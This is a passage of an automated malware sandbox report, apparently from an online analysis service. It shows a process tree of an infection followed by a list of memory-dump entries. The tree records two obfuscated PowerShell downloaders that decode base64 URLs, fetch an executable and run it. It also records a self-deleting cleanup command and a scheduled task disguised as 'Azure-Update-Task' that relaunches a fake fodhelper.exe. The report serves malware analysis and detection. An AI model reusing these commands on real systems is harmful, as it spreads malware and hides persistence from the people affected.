                                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 4964 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\899417348964903\\* & exit
                                          14⤵
                                          • Checks whether UAC is enabled
                                          • Maps connected drives based on registry
                                          PID:4160
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /pid 4964
                                            15⤵
                                            • Kills process with taskkill
                                            PID:2328
                                  • C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
                                    C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
                                    11⤵
                                    • Executes dropped EXE
                                    PID:4312
                              • C:\Users\Admin\AppData\Local\Temp\gev.exe
                                C:\Users\Admin\AppData\Local\Temp\gev.exe
                                9⤵
                                • Executes dropped EXE
                                PID:4880
                              • C:\Users\Admin\AppData\Local\Temp\gev.exe
                                C:\Users\Admin\AppData\Local\Temp\gev.exe
                                9⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Maps connected drives based on registry
                                PID:2132
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 1444
                                  10⤵
                                  • Maps connected drives based on registry
                                  • Program crash
                                  PID:4912
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 2
                          6⤵
                          • Delays execution with timeout.exe
                          PID:1548
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                          6⤵
                          • Checks whether UAC is enabled
                          PID:1556
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            7⤵
                            • Blocklisted process makes network request
                            • Maps connected drives based on registry
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4136
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                          6⤵
                          • Checks whether UAC is enabled
                          PID:4260
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            7⤵
                            • Maps connected drives based on registry
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4368
              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                1⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Maps connected drives based on registry
                • Suspicious use of SetThreadContext
                PID:3484
                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                  2⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Maps connected drives based on registry
                  PID:1668
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                    3⤵
                    • Creates scheduled task(s)
                    PID:1148
              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                1⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Maps connected drives based on registry
                • Suspicious use of SetThreadContext
                PID:4424
                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1676
              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                1⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Maps connected drives based on registry
                • Suspicious use of SetThreadContext
                PID:4548
                • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4560
              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                1⤵
                • Executes dropped EXE
                PID:1264

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/428-272-0x0000000009370000-0x0000000009371000-memory.dmp

                Filesize

                4KB

              • memory/428-206-0x00000000008D0000-0x00000000008D1000-memory.dmp

                Filesize

                4KB

              • memory/428-221-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

                Filesize

                4KB

              • memory/428-224-0x0000000007360000-0x0000000007361000-memory.dmp

                Filesize

                4KB

              • memory/428-274-0x0000000008B00000-0x0000000008B01000-memory.dmp

                Filesize

                4KB

              • memory/428-283-0x0000000006603000-0x0000000006604000-memory.dmp

                Filesize

                4KB

              • memory/428-252-0x00000000008D0000-0x00000000008D1000-memory.dmp

                Filesize

                4KB

              • memory/428-209-0x0000000006CC0000-0x0000000006CC1000-memory.dmp

                Filesize

                4KB

              • memory/428-208-0x0000000006650000-0x0000000006651000-memory.dmp

                Filesize

                4KB

              • memory/428-226-0x0000000007600000-0x0000000007601000-memory.dmp

                Filesize

                4KB

              • memory/428-241-0x0000000007E00000-0x0000000007E01000-memory.dmp

                Filesize

                4KB

              • memory/428-235-0x0000000008010000-0x0000000008011000-memory.dmp

                Filesize

                4KB

              • memory/428-207-0x00000000008D0000-0x00000000008D1000-memory.dmp

                Filesize

                4KB

              • memory/428-223-0x00000000072F0000-0x00000000072F1000-memory.dmp

                Filesize

                4KB

              • memory/428-220-0x0000000006600000-0x0000000006601000-memory.dmp

                Filesize

                4KB

              • memory/428-222-0x0000000006602000-0x0000000006603000-memory.dmp

                Filesize

                4KB

              • memory/428-232-0x0000000007A90000-0x0000000007A91000-memory.dmp

                Filesize

                4KB

              • memory/832-217-0x0000000005690000-0x0000000005792000-memory.dmp

                Filesize

                1.0MB

              • memory/920-334-0x0000000003AE0000-0x0000000003BE2000-memory.dmp

                Filesize

                1.0MB

              • memory/964-366-0x0000000005F10000-0x0000000006012000-memory.dmp

                Filesize

                1.0MB

              • memory/972-212-0x0000000005640000-0x0000000005742000-memory.dmp

                Filesize

                1.0MB

              • memory/972-197-0x00000000006E0000-0x00000000006E1000-memory.dmp

                Filesize

                4KB

              • memory/972-196-0x00000000001E0000-0x00000000001E3000-memory.dmp

                Filesize

                12KB

              • memory/1276-148-0x0000000002140000-0x00000000021A6000-memory.dmp

                Filesize

                408KB

              • memory/1276-140-0x0000000000400000-0x0000000000435000-memory.dmp

                Filesize

                212KB

              • memory/1276-152-0x0000000002140000-0x00000000021A6000-memory.dmp

                Filesize

                408KB

              • memory/1276-153-0x0000000000470000-0x000000000047D000-memory.dmp

                Filesize

                52KB

              • memory/1276-154-0x0000000002630000-0x0000000002631000-memory.dmp

                Filesize

                4KB

              • memory/1276-155-0x0000000002660000-0x000000000266C000-memory.dmp

                Filesize

                48KB

              • memory/1276-163-0x0000000002650000-0x0000000002651000-memory.dmp

                Filesize

                4KB

              • memory/1276-147-0x0000000000400000-0x0000000000435000-memory.dmp

                Filesize

                212KB

              • memory/1276-146-0x0000000000400000-0x0000000000435000-memory.dmp

                Filesize

                212KB

              • memory/1308-187-0x00000000053F0000-0x00000000054F2000-memory.dmp

                Filesize

                1.0MB

              • memory/1308-179-0x0000000002D90000-0x0000000002D91000-memory.dmp

                Filesize

                4KB

              • memory/1392-213-0x0000000005F40000-0x0000000006042000-memory.dmp

                Filesize

                1.0MB

              • memory/1408-423-0x0000000003030000-0x000000000317A000-memory.dmp

                Filesize

                1.3MB

              • memory/1408-337-0x0000000003920000-0x0000000003A22000-memory.dmp

                Filesize

                1.0MB

              • memory/1408-371-0x0000000003030000-0x000000000317A000-memory.dmp

                Filesize

                1.3MB

              • memory/1808-185-0x00000000052D0000-0x00000000053D2000-memory.dmp

                Filesize

                1.0MB

              • memory/1808-174-0x0000000000F40000-0x0000000000FEE000-memory.dmp

                Filesize

                696KB

              • memory/1936-218-0x0000000005E80000-0x0000000005E81000-memory.dmp

                Filesize

                4KB

              • memory/1936-215-0x0000000005A90000-0x0000000005B92000-memory.dmp

                Filesize

                1.0MB

              • memory/2088-175-0x0000000007940000-0x0000000007941000-memory.dmp

                Filesize

                4KB

              • memory/2088-150-0x0000000000830000-0x0000000000831000-memory.dmp

                Filesize

                4KB

              • memory/2088-184-0x00000000078A0000-0x0000000007932000-memory.dmp

                Filesize

                584KB

              • memory/2088-183-0x00000000078A0000-0x0000000007932000-memory.dmp

                Filesize

                584KB

              • memory/2088-161-0x0000000007590000-0x0000000007591000-memory.dmp

                Filesize

                4KB

              • memory/2088-172-0x0000000007595000-0x0000000007596000-memory.dmp

                Filesize

                4KB

              • memory/2088-162-0x0000000007593000-0x0000000007595000-memory.dmp

                Filesize

                8KB

              • memory/2088-182-0x0000000008820000-0x0000000008922000-memory.dmp

                Filesize

                1.0MB

              • memory/2220-173-0x00000000031E0000-0x0000000003316000-memory.dmp

                Filesize

                1.2MB

              • memory/2220-160-0x00000000031E0000-0x0000000003316000-memory.dmp

                Filesize

                1.2MB

              • memory/2220-186-0x0000000004C30000-0x0000000004DBE000-memory.dmp

                Filesize

                1.6MB

              • memory/2220-164-0x0000000000DA0000-0x00000000011DF000-memory.dmp

                Filesize

                4.2MB

              • memory/2220-165-0x0000000000A10000-0x0000000000B12000-memory.dmp

                Filesize

                1.0MB

              • memory/2220-167-0x00000000031E0000-0x0000000003316000-memory.dmp

                Filesize

                1.2MB

              • memory/2220-166-0x00000000031E0000-0x0000000003316000-memory.dmp

                Filesize

                1.2MB

              • memory/2376-219-0x0000000002820000-0x0000000002821000-memory.dmp

                Filesize

                4KB

              • memory/2376-216-0x0000000002960000-0x0000000002A62000-memory.dmp

                Filesize

                1.0MB

              • memory/2472-367-0x0000000006D20000-0x0000000006E22000-memory.dmp

                Filesize

                1.0MB

              • memory/3188-228-0x0000000003530000-0x0000000003531000-memory.dmp

                Filesize

                4KB

              • memory/3188-227-0x0000000003530000-0x0000000003531000-memory.dmp

                Filesize

                4KB

              • memory/3188-237-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

                Filesize

                4KB

              • memory/3188-238-0x0000000004DB2000-0x0000000004DB3000-memory.dmp

                Filesize

                4KB

              • memory/3188-284-0x0000000004DB3000-0x0000000004DB4000-memory.dmp

                Filesize

                4KB

              • memory/3188-257-0x0000000003530000-0x0000000003531000-memory.dmp

                Filesize

                4KB

              • memory/3560-180-0x0000000003270000-0x0000000003271000-memory.dmp

                Filesize

                4KB

              • memory/3560-159-0x0000000073FF0000-0x0000000073FF1000-memory.dmp

                Filesize

                4KB

              • memory/3560-144-0x00000000771A0000-0x00000000771A1000-memory.dmp

                Filesize

                4KB

              • memory/3560-143-0x0000000000400000-0x000000000066B000-memory.dmp

                Filesize

                2.4MB

              • memory/3560-181-0x0000000004840000-0x0000000004942000-memory.dmp

                Filesize

                1.0MB

              • memory/3560-145-0x0000000002570000-0x0000000002571000-memory.dmp

                Filesize

                4KB

              • memory/4136-246-0x0000000003190000-0x0000000003191000-memory.dmp

                Filesize

                4KB

              • memory/4136-290-0x0000000003190000-0x0000000003191000-memory.dmp

                Filesize

                4KB

              • memory/4136-370-0x0000000009830000-0x0000000009EA8000-memory.dmp

                Filesize

                6.5MB

              • memory/4136-255-0x0000000006FF2000-0x0000000006FF3000-memory.dmp

                Filesize

                4KB

              • memory/4136-253-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

                Filesize

                4KB

              • memory/4136-331-0x0000000006FF3000-0x0000000006FF4000-memory.dmp

                Filesize

                4KB

              • memory/4136-247-0x0000000003190000-0x0000000003191000-memory.dmp

                Filesize

                4KB

              • memory/4368-269-0x0000000006F32000-0x0000000006F33000-memory.dmp

                Filesize

                4KB

              • memory/4368-259-0x0000000003140000-0x0000000003141000-memory.dmp

                Filesize

                4KB

              • memory/4368-268-0x0000000006F30000-0x0000000006F31000-memory.dmp

                Filesize

                4KB

              • memory/4368-374-0x00000000096F0000-0x0000000009D68000-memory.dmp

                Filesize

                6.5MB

              • memory/4368-261-0x0000000003140000-0x0000000003141000-memory.dmp

                Filesize

                4KB

              • memory/4368-368-0x0000000006F33000-0x0000000006F34000-memory.dmp

                Filesize

                4KB

              • memory/4368-369-0x00000000095A0000-0x00000000096A2000-memory.dmp

                Filesize

                1.0MB

              • memory/4696-373-0x0000000006B32000-0x0000000006B33000-memory.dmp

                Filesize

                4KB

              • memory/4696-422-0x0000000006B33000-0x0000000006B34000-memory.dmp

                Filesize

                4KB

              • memory/4696-372-0x0000000006B30000-0x0000000006B31000-memory.dmp

                Filesize

                4KB

              • memory/4884-341-0x0000000005040000-0x0000000005041000-memory.dmp

                Filesize

                4KB

              • memory/4900-342-0x0000000004E40000-0x0000000004E41000-memory.dmp

                Filesize

                4KB